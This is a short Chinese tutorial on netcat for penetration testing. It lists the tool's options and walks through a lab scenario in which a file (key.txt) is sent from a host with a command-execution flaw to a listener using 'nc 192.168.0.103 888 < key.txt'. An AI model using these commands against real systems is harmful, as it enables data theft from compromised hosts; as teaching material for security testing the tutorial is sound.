NC利用

目录

1. 基本命令
2. 利用场景

---

 基本命令

NC就是netcat，渗透测试中被称为瑞士军刀，它可以用作端口监听、端口扫描、远程文件传输、还可以实现远程shell等功能；

语法：NC  [参数]

-g<网关>：设置路由器跃程通信网关，最多设置8个；

-G<指向器数目>：设置来源路由指向器，其数值为4的倍数；

-h：在线帮助；

-i<延迟秒数>：设置时间间隔，以便传送信息及扫描通信端口；

-l：使用监听模式，监控传入的资料；

-n：直接使用ip地址，而不通过域名服务器；

-o<输出文件>：指定文件名称，把往来传输的数据以16进制字码倾倒成该文件保存；

-p<通信端口>：设置本地主机使用的通信端口；

-r：指定源端口和目的端口都进行随机的选择；

-s<来源位址>：设置本地主机送出数据包的IP地址；

-u：使用UDP传输协议；

-v：显示指令执行过程；

-w<超时秒数>：设置等待连线的时间；

-z：使用0输入/输出模式，只在扫描通信端口时使用。

---

 利用场景

终端A(centos)：192.168.242.131

终端B(windows)：192.168.0.103

场景：如果A上部署了web服务，存在命令执行的情况，那么可以使用NC监听A上的内容。

例如A终端/var目录下有一个key.txt

 

a.在windows的B终端监听端口888，使用nc.exe -lvvvp 888，完成监听

 

b.在centos终端传输文件内容到B终端，使用nc 192.168.0.103 888 < key.txt

 

c.这个时候可以在B中打印key.txt的文件内容